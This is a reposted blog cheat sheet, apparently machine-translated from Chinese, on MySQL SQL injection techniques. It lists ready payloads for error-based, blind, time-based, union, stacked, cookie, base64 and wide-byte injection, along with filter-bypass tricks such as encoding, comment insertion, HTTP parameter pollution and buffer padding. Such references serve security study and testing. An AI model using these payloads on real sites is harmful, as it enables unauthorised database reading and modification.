SQL injection summary learning

Enterprise 2023-05-04 18:59:35 views: null

SQL injection summary learning

by type

Integer

character type

According to the HTTP submission method

GET injection

POST injection

Cookie injection

According to injection method

Error injection

Based on floor, UpdateXml (with length limit, up to 32 characters), ExtractValue (with length limit, up to 32 characters) for error injection.

floor() and rand()

union select count(*),2,concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a       /*利用错误信息得到当前数据库名*/

extractvalue()

id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))

updatexml()

id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))

geometrycollection()

id=1 and geometrycollection((select * from(select * from(select user())a)b))

multipoint()

id=1 and multipoint((select * from(select * from(select user())a)b))

polygon()

id=1 and polygon((select * from(select * from(select user())a)b))

multipolygon()

id=1 and multipolygon((select * from(select * from(select user())a)b))

linestring()

id=1 and linestring((select * from(select * from(select user())a)b))

multilinestring()

id=1 and multilinestring((select * from(select * from(select user())a)b))

exp()

id=1 and exp(~(select * from(select user())a))

Procedure_Analysis

Injection with error reporting is enough/You can also use the injection point after the limit injection
insert image description here
sample
insert image description here

time injection

id = 1 and if(length(database())>1,sleep(5),1)

blind note

use function

length(str) : returns the length of the string str

substr(str, pos, len) : Intercept the characters of length len from str starting from position pos to return. Note that the pos position here starts from 1, not from 0 in the array

mid(str, pos, len) : Same as above, intercept the string

ascii(str) : Returns the ASCII code value of the leftmost character of the string str

ord(str) : Convert character or Boolean type to ascll code

if(a,b,c) : a is the condition, a is true, return b, otherwise return c, such as if(1>2,1,0), return 0

Boolean Blind

and ascii(substr((select database()),1,1))>64 /*判断数据库名的第一个字符的ascii值是否大于64*/

time blind

id=1 union select if(SUBSTRING(user(),1,1)='root',sleep(4),1),null,null /*提取用户名第一个个字符做判断,正确就延迟4秒,错误返回1*/

union injection

id =-1 union select 1,2,3   /*获取字段*/

Boolean injection

id=1' substr(database(),1,1)='t'--+     /*判断数据名*/

Cookie injection

When you find that there is no request parameter in the url, but the result can be obtained in singular, you can check whether the request parameter is in the cookie, and then use the conventional injection method to inject the test in the cookie, but the injection position is in the cookie, which is the same as Injection in url makes no difference.
Cookie: id = 1 and 1=1

stack query injection

id = 1';select if(sub(user(),1,1)='r',sleep(3),1)%23

  • Introduction to Stack Injection

  • Stacked injections: Stacked injections. From the meaning of the noun, it can be seen that a bunch of sql statements (multiple) should be executed together. This is also the case in real applications. We know that in mysql, mainly in the command line, ; is added at the end of each statement to indicate the end of the statement. In this way, we thought of whether multiple sentences can be used together. This is called stacked injection.

  • principle

  • In SQL, a semicolon (;) is used to indicate the end of a sql statement. Just imagine that we continue to construct the next statement after finishing a sql statement, will it be executed together? So this idea also created stack injection. And union injection (joint injection) also merges two statements together. Is there any difference between the two? The difference is that the types of statements executed by union or union all are limited and can be used to execute query statements, while stack injection can execute arbitrary statements.

  • The limitation of stack injection is that it cannot be executed in every environment, and it may be limited by API or database engine unsupported. Of course, insufficient permissions can also explain why attackers cannot modify data or call some programs.

  • Although we mentioned earlier that stacked queries can execute arbitrary SQL statements, this injection method is not perfect. In our web system, because the code usually only returns one query result, therefore, the second statement of the stack injection generates an error or the result can only be ignored, and we cannot see the returned result on the front-end interface.

  • Therefore, when reading data, we recommend using union injection. At the same time, before using stack injection, we also need to know some database-related information, such as table name, column name and other information.

  • insert image description here
    insert image description here
    insert image description here
    insert image description here
    Successfully deleted

tips:

  1. Not all environments support stack injection, such as Oracle
  2. Usually only one result is returned when querying, which may cause subsequent SQL statements to be unable to be echoed to the page

base64 injection

Base64 encode the parameters before sending the request.

说明:id=1',1的base64编码为MSc=,而=的url编码为%3d,
So get the following result:

id=MSc%3d

note

#
-- (有空格)或--+
/**/
  • Inline comments:
/*!...*/

coding problem

wide byte injection

  • The query parameters are surrounded by single quotes, and the incoming single quotes are escaped by the escape character (), such as using addslashes() or its filtering function for the accepted parameters in the background database
  • The encoding of the database is GBK

use

id = -1%DF' union select 1,user(),3,%23
Under the above conditions, the single quotation mark ' is escaped to %5c, so it constitutes %df%5c, and in the GBK encoding method, %df%5c is a traditional Chinese character "lian", so the single quotation mark escapes successfully

  • When mysql uses GBK encoding, it will think that two characters are a Chinese character (the previous character needs ascii code greater than 128 to reach the range of Chinese characters)
  • The essence of wide-byte injection is that the character sets used by PHP and MySQL are different. As long as the low-order range contains the encoding of 0x5c, wide-byte injection can be performed.

Differences between versions above MySQL 5.0 and versions below MySQL 5.0

MySQL 5.0 and above has an information database - INFORMATION_SCHEMA that stores database information, which holds information about all other databases maintained by the MySQL server. Such as the database name, the table of the database, the data type and access authority of the table column, etc. And below 5.0 there is no.

information_schema

System database, which records the database, tables, columns, user permissions and other information of the current database

SCHEMATA

Store the basic information of all mysql databases, including database name, encoding type path, etc.

TABLES

Store table information in mysql, including whether the table is a basic table or a system table, what is the engine of the database, how many rows the table has, creation time, last update time, etc.

COLUMNS

Store the column information of the table in mysql, including all the columns of the table and the information of each column, which column is the column in the table, the data type of the column, the encoding type of the column, the permission of the column, the comment of the column, etc.

bypass

case bypass

double write bypass

Encoding bypass (url full encoding, hexadecimal)

Inline comment bypass

keyword substitution

comma bypass

From to can be used in the substr and mid() functions to get rid of the use of commas;

Offset can be used in limit to get rid of the use of commas

Comparison symbols ( >, < ) bypass

greatest、between and

Replacement of logical symbols

and=&&
or=||
xor=|
not=!

space bypass

Bypass with brackets, + etc.

Equivalence function bypass

  • hex()、bin()=ascii()
  • concat_ws()=group_concat()
  • mid()、substr()=substring()

http parameter pollution

HTTP Parameter Pollution (HTTP Parameter Pollution) Attackers launch attacks by inserting specific parameters into HTTP requests. If there are such vulnerabilities in web applications, attackers can use them to carry out client-side or server-side attacks

For example, when I search on Google and Baidu, I pass the query parameters twice. Google will load both as search content, and Baidu will only load the first one.

insert image description here

id=1 union select+1,2,3+from+users+where+id=1–
becomes
id=1 union select+1&id=2,3+from+users+where+id=1–

buffer overflow bypass

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36–+
Among them, 0xAAAAAAAAAAAAAAAAAAAAA, the more A, the better. Generally, there will be a critical value. In fact, this method is also useful for bypassing the suffix name.

Guess you like

Origin blog.csdn.net/hxhxhxhxx/article/details/108921489
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com